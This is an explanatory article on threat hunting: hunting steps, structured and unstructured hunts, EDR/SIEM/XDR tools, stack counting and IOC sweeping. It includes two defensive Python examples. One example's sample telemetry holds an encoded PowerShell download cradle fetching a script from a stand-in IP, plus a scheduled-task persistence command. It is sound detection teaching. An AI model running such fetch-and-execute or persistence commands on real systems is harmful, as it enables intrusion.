Cyber threats are constantly becoming harder to detect, and conventional security tools are struggling to adapt.
Attacks involving advanced persistent threats (APTs) were reported to be 74% higher in 2024 than in 2023, putting data at risk and stretching security teams. Threat hunting has emerged as an effective way to surface advanced threats that evade standard security measures so that they can be removed.
This article will introduce the threat hunting process, discuss common tools and techniques, and suggest best practices to implement threat hunting effectively.
What is threat hunting in cybersecurity?
Threat hunting is the proactive search for advanced, well-concealed threats that are already inside an environment. Rather than waiting for an alert, hunters draw on threat intelligence and their own knowledge of the environment to find adversaries that have slipped past endpoint, network, and identity defenses, and hand confirmed findings to incident response for removal.
Threat hunting matters because many advanced persistent threats (APTs) evade standard detection systems. Successful APT infiltration enables attackers to monitor network activity over months or years. Attackers can move laterally throughout network assets, gather credentials, and identify targets for data breaches. Threat hunting is a complementary capability that works alongside preventive/detective controls and incident response to find threats that evade existing defenses.
How does threat hunting work?
Threat hunting generally supplements automated threat detection systems, adding a human element to cybersecurity setups. It involves human-driven analysis of vast amounts of security data (including logs, network traffic, and endpoint activity) to uncover sophisticated adversaries.
Threat hunters are skilled analysts who work within an organization's security team or via third-party security partners. Analysts consider each potential attack based on intelligence, trends, or anomalous patterns. They then meticulously investigate this hypothesis across the organization's digital environment.
The key takeaway is that hunters do not wait for alerts. They proactively seek evidence of compromise and escalate confirmed findings to incident response for containment and eradication.
Steps in the threat hunting process
Threat hunting takes many forms, depending on the nature of the organization and the threats it faces. However, threat hunting methods tend to rest on a consistent series of steps. Stages in the threat hunting process include:
1. Initial triggers
Threat hunting expeditions begin with a trigger event or discovery. For example, analysts may note an emerging threat that abuses remote access tools, or a new rootkit that runs fileless, leaving nothing on disk for antivirus to scan. Threat intelligence may point to an ongoing phishing campaign, while research partners may highlight new threat actors and their tactics, techniques, and procedures (TTPs).
Analysts use triggers to identify areas of focus, then examine specific network components, identities, or applications for malicious activity. Triggers can be theoretical (a hypothesis about how an adversary would operate in this environment) or material (a specific, immediate indicator such as a hash or a command line).
2. Investigation
Investigations take a deep dive into potential attacks. Tools like endpoint detection and response (EDR) provide visibility into endpoints, while network and identity telemetry covers the rest of the environment. Analysts review network connections, file transfers, user logins, process executions, and registry changes to confirm or refute the hypothesis and to scope any compromise they find.
This phase continues until hypotheses are validated and findings documented, after which incident response handles containment and recovery.
3. Mitigation
The final stage is to report and hand off findings to incident response, which performs containment, eradication, and recovery to restore normal operations. Threat hunters compile comprehensive reports for security teams and other stakeholders. Reports indicate necessary security actions and contribute to ongoing security monitoring.
Threat hunters do not just feed information to technicians or managers. They build databases of past and current threats. This information details the nature and motivations of attackers, allowing organizations to improve their security posture and prevent future incidents.
Types of cyber threat hunting
In broad terms, cybersecurity threat hunting can be structured or unstructured. Organizations may take a two-pronged approach, incorporating both variants, or focus on one method to achieve their security goals.
Structured hunting
Structured hunting is intelligence-led and follows a predefined framework. Threat hunters start with a trigger derived from threat intelligence, such as a newly reported adversary tactic, technique, or procedure (TTP). Hunters then systematically query security data across their environment to detect the presence of that specific activity.
Structured hunting works well against known threats, because hunters compare documented adversary behavior with what their telemetry actually shows. It is less effective against unknown or novel threats, since a structured hunt can only find what it has been told to look for.
However, structured approaches are consistent and accessible. Organizations can leverage public frameworks like MITRE ATT&CK to identify urgent threats and the TTPs behind them, and security teams are less reliant on sophisticated internal monitoring systems to get started.
Unstructured hunting
Unstructured hunting is a more exploratory approach. Investigations are triggered by an anomaly or an indicator rather than by a documented adversary technique. For instance, an odd log entry may raise an internal alert, or a hunter may notice a malware hash on an intelligence feed that has no associated TTP yet.
Threat hunters may not have a specific threat actor or technique in mind. Instead, unstructured hunting techniques use triggers as clues. This approach often uncovers hidden and persistent threats that structured hunting misses.
Entity-driven threat hunting
There is also a third form of threat hunting to consider. This type of threat hunting prioritizes high-value and high-risk assets. Security teams search for threats connected to that "entity". For example, analysts may focus on the accounts of executives or administrators, or data containers holding private health information.
Threat hunting tools and techniques
Threat hunters rely on a set of security tools and techniques to direct their efforts, investigate threats, and ensure effective responses.

Threat hunting tools
- Endpoint detection and response (EDR): EDR tools gather security data continuously, allowing threat hunters to look for evidence such as process executions or suspicious connections that evade automated security controls.
- Security Information and Event Management (SIEM): SIEM tools aggregate, normalize, and retain logs of user actions and network events from across the environment. Retained log data lets threat hunters assess longer-term patterns and match internal activity against external intelligence about threat behavior.
- Extended detection and response (XDR): XDR goes beyond EDR. It provides threat hunting teams with visibility over internal events such as lateral movement between network assets. XDR also unifies data from endpoints, apps, and cloud platforms, making it easier to correlate indicators across the network environment.
- Behavioral monitoring tools: Specialized monitoring tools compare network activity against baselines to detect suspicious patterns. This generates high-quality leads for investigators to follow.
Threat hunting techniques
- Searches: Simple queries allow threat hunters to match specific indicators and develop data sets for further analysis.
- IOC sweeping: Extends simple searching by "sweeping" the network environment for indicators of compromise.
- Cluster analysis: Analysts sort data into logically related clusters. For example, traffic flows and login attempts may exhibit similar behavior, potentially indicating a coordinated attack.
- Grouping: Analysts take a set of distinct artifacts that have already been flagged as suspicious, such as a list of IP addresses, and look for those that occur together under shared criteria, for instance the same source host within a short time window. Because grouping starts from data already flagged as suspicious, it reduces false positives and concentrates effort on high-probability threats.
- Stack counting: Threat hunters count how often each value of a field (a process name, a file hash, a service, a user agent) occurs across a population of similar systems. Common values form the baseline; values seen on only one or two hosts are the outliers worth a closer look. Stack counting is a simple form of behavior analysis that works best on homogeneous populations and often provides early warning of embedded threats.
- Anomaly detection: Machine learning algorithms maintain dynamic baselines and continuously model "normal" behavior against network activity.
- Principal Component Analysis (PCA): Reduces the dimensionality of large data sets by projecting them onto the few components that explain most of the variance, so analysts can look for outliers without being swamped by noise. PCA highlights unusual activity; deciding whether that activity is malicious still falls to the analyst.
- Deception: Threat hunters plant lures that no legitimate user or process should ever touch. For example, fake files, credentials, or database records function as honeytokens; any access to them is a high-fidelity signal that someone is where they should not be.
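Stack counting and IOC sweeping from the list above, as an added example that is not code from the original article. Everything in it is constructed: twenty workstations on an identical build, two planted anomalies, and a small IOC list standing in for a threat-intelligence feed. The field names and host names are assumptions chosen for the illustration.

```python
"""Stack counting and IOC sweeping over endpoint process telemetry.

Added example, not code from the original article. The events, host names,
hashes and the IOC list are all constructed for illustration.
"""
from collections import defaultdict

# Constructed fleet: 20 workstations on the same standard build, so the same
# process/hash combinations should appear on most of them.
HOSTS = [f"ws{n:02d}" for n in range(1, 21)]
SVCHOST = r"C:\Windows\System32\svchost.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
DROPPER = r"C:\Users\Public\update.exe"

EVENTS = []
for host in HOSTS:
    EVENTS += [
        {"host": host, "parent": "services.exe", "image": SVCHOST, "sha256": "a" * 64},
        {"host": host, "parent": "explorer.exe", "image": OUTLOOK, "sha256": "b" * 64},
    ]
# Two planted anomalies, each on a single host:
#  - Outlook spawning an executable from a world-writable path (known-bad hash).
#  - A binary at the legitimate svchost path but with an unknown hash.
EVENTS.append({"host": "ws07", "parent": "OUTLOOK.EXE", "image": DROPPER, "sha256": "c" * 64})
EVENTS.append({"host": "ws13", "parent": "services.exe", "image": SVCHOST, "sha256": "d" * 64})

# Constructed IOC list, standing in for a threat-intelligence feed.
IOCS = {"sha256": {"c" * 64}, "path": {DROPPER}}


def stack_count(events, key_fields, max_hosts=1):
    """Stack counting: for each distinct combination of key_fields, record the
    hosts it appears on, then return the combinations seen on at most
    max_hosts hosts, rarest first. On a homogeneous fleet, rarity is the lead:
    a process/hash pair present on 1 of 20 identical hosts is an outlier."""
    hosts_by_value = defaultdict(set)
    for ev in events:
        hosts_by_value[tuple(ev[f] for f in key_fields)].add(ev["host"])
    rare = [(value, sorted(hosts)) for value, hosts in hosts_by_value.items()
            if len(hosts) <= max_hosts]
    return sorted(rare, key=lambda item: (len(item[1]), item[0]))


def ioc_sweep(events, iocs):
    """IOC sweep: match every event against known-bad hashes and paths.
    Returns (host, indicator) pairs. It only finds what the feed already knows."""
    hits = []
    for ev in events:
        if ev["sha256"] in iocs["sha256"]:
            hits.append((ev["host"], "sha256:" + ev["sha256"]))
        if ev["image"] in iocs["path"]:
            hits.append((ev["host"], "path:" + ev["image"]))
    return hits


if __name__ == "__main__":
    print("Stack count on (image, sha256), values present on a single host:")
    for value, hosts in stack_count(EVENTS, ("image", "sha256")):
        print("  ", hosts, value)
    print("IOC sweep hits:")
    for host, indicator in ioc_sweep(EVENTS, IOCS):
        print("  ", host, indicator)
```

The IOC sweep finds only the ws07 dropper, because that is the only artifact the feed knows about. The stack count on (image, sha256) also surfaces the ws13 binary sitting at the svchost path with a hash nobody has seen before, which no IOC list would catch. That is why hunters run the two together: sweeps confirm known threats quickly, while stack counting gives leads on unknown ones, provided the population being stacked is genuinely homogeneous.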
Best practices of cyber threat hunting
Threat hunting is a powerful addition to an organization's security posture. However, inefficient hunting is expensive and gives false assurance, allowing threats to thrive below the surface. The best practices below will help you implement threat hunting effectively and safely.
- Understand critical assets: Identify the data stores, applications, and user accounts that are most attractive to attackers and most damaging if compromised. Hunt for threats that affect high-risk assets rather than spending resources on low-value targets.
- Create reliable activity baselines: Use automated tools to build accurate baselines of normal user, host, and network activity, and keep them current as the environment changes. Outliers are only meaningful against a trustworthy baseline.
- Gather security data widely: Employ EDR, SIEM, and XDR (where possible) to cover all endpoints and internal network assets. Aggregate real-time monitoring with logs to capture maximum information about hidden threats.
- Leverage threat intelligence: Effective threat hunting relies on external intelligence. Combine internal data collection with intel about current threat actors and TTPs.
- Use intelligence to develop relevant hypotheses: A hypothesis-driven framework works well when detecting specific advanced threats. Identify high-risk threats based on open source databases like MITRE ATT&CK or third-party services.
- Automate threat detection tasks: Automation and machine learning tools reduce the workload for threat hunting teams. Leave IOC scanning and correlation to automated tools and focus human eyes on active investigations.
- Upskill internal teams to master threat hunting: Internal security teams may not be ready to deploy proactive threat hunting. Train team members in behavior analysis, using threat intelligence, forensic investigation, and using EDR or SIEM tools.
- Learn from threat hunting outcomes: Investigations and analysis should feed into a process of continual improvement. Use outcomes to refine detection rules, reduce false positives, and cut metrics like dwell time or time-to-respond. Annual threat hunting audits should assess performance and suggest improvements.
Threat hunting methodologies
Methodologies are specific threat hunting models. Organizations can deploy three main threat hunting methodologies, with different levels of sophistication and capabilities:
- Hypothesis-based threat hunting: Organizations draw on shared threat intelligence about emerging and active threats. Security teams assess the tactics, techniques, and procedures (TTPs) of actors likely to target them and form a hypothesis about what evidence those TTPs would leave behind. Threat hunters then use behavior analysis tools and queries to determine whether that evidence is present in their environment.
- Indicators of compromise or attack: This methodology draws on a wider pool of tactical threat intelligence. Indicators of compromise (IOCs) are concrete artifacts such as file hashes, IP addresses, domains, or file paths. Indicators of attack (IOAs) describe behavior, such as a burst of failed logins, an unusual file transfer pattern, unexpected port activity, or an Office application spawning a command shell. Analysts combine IOCs and IOAs with threat intelligence to identify attack types and enrich the incident response process.
- Machine learning and AI-based analytics: Next-generation threat hunting uses ML and artificial intelligence to analyze vast quantities of network data. Analytic tools search for behavioral anomalies that indicate active attacks, including the well-hidden footprints of APTs. Human analysts take over when tools generate alerts, performing in-depth triage and extended hunting.
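The hypothesis-based methodology above, and the structured hunting it belongs to, as an added example that is not code from the original article. Three hypotheses are mapped to MITRE ATT&CK technique IDs and tested against constructed process-creation records; the host names, the URL, and the predicates are assumptions made for the illustration, and the predicates are deliberately simplified rather than full coverage of those techniques.

```python
"""Hypothesis-driven hunt: test ATT&CK-mapped hypotheses against process telemetry.

Added example, not code from the original article. The events, host names and
URL are constructed; the technique IDs are MITRE ATT&CK IDs, but the predicates
are deliberately simplified illustrations, not full coverage of those techniques.
"""
import base64
import re
from dataclasses import dataclass
from typing import Callable

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Strings that make a decoded PowerShell payload worth a hunter's time.
DOWNLOAD_CRADLE = ("downloadstring", "invoke-expression", "iex ", "net.webclient", "frombase64string")
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)


@dataclass
class Hypothesis:
    technique: str              # ATT&CK technique ID the hypothesis is mapped to
    statement: str              # what we expect to see if the adversary is present
    test: Callable[[dict], bool]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ps_encode(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def office_spawns_shell(ev: dict) -> bool:
    return basename(ev["parent"]) in OFFICE_APPS and basename(ev["image"]) in SHELLS


def encoded_powershell(ev: dict) -> bool:
    """Flag encoded PowerShell only when the decoded script looks like a download
    cradle; a bare encoded 'Get-Date' from an admin script is not a finding."""
    if basename(ev["image"]) not in PS_IMAGES:
        return False
    m = ENC_FLAG.search(ev["cmdline"])
    if not m:
        return False
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return True   # an encoded blob that does not decode is itself a lead
    return any(token in decoded.lower() for token in DOWNLOAD_CRADLE)


def task_from_user_writable_path(ev: dict) -> bool:
    cmd = ev["cmdline"]
    return (basename(ev["image"]) == "schtasks.exe" and "/create" in cmd.lower()
            and USER_WRITABLE.search(cmd) is not None)


HYPOTHESES = [
    Hypothesis("T1204.002", "Phished users open documents whose macros spawn a shell", office_spawns_shell),
    Hypothesis("T1059.001", "Malware stages payloads via encoded PowerShell download cradles", encoded_powershell),
    Hypothesis("T1053.005", "Persistence is a scheduled task pointing at a user-writable path", task_from_user_writable_path),
]

CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed process-creation records
    {"host": "ws03", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c powershell -w hidden -enc " + ps_encode(CRADLE)},
    {"host": "ws03", "parent": r"C:\Windows\System32\cmd.exe",
     "image": PS, "cmdline": "powershell -w hidden -enc " + ps_encode(CRADLE)},
    {"host": "ws03", "parent": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Updater /tr C:\Users\alice\AppData\Roaming\up.exe /sc minute /mo 10"},
    {"host": "ws11", "parent": r"C:\Windows\explorer.exe",
     "image": PS, "cmdline": "powershell -enc " + ps_encode("Get-Date")},  # benign admin one-liner
    {"host": "ws11", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Backup /tr C:\Program Files\Backup\run.exe /sc daily"},
]


def run_hunt(hypotheses, events):
    """Return {technique: [evidence, ...]}. An empty list means the data did not
    support that hypothesis, which is itself a documented hunt outcome."""
    findings = {h.technique: [] for h in hypotheses}
    for ev in events:
        for h in hypotheses:
            if h.test(ev):
                findings[h.technique].append({"host": ev["host"], "image": ev["image"], "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    results = run_hunt(HYPOTHESES, EVENTS)
    for h in HYPOTHESES:
        hits = results[h.technique]
        print(f"{h.technique} {h.statement}: {len(hits)} finding(s) on {sorted({x['host'] for x in hits})}")
```

Each hypothesis is a predicate that states, in code, what evidence the TTP would leave in telemetry, so the hunt either validates it with concrete records to hand to incident response or refutes it for the data examined. The encoded PowerShell check decodes the payload before deciding, which is what keeps a legitimate admin one-liner on ws11 out of the findings while the download cradle on ws03 is caught; a hunt that only matched on the -enc flag would have buried the real lead under routine noise.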
Why does your organization need a threat hunting strategy?
Threat hunting has clear advantages in today's cybersecurity landscape. Advanced threats pose a critical risk to modern organizations and often evade conventional security tools. Threat hunting closes this gap by proactively seeking out active threats and handing them to incident response before they cause harm.
Threat hunting is a core component of a modern security strategy that builds resilience and reduces business risk. As purely reactive security measures prove insufficient against patient, well-resourced adversaries, proactive techniques are becoming essential.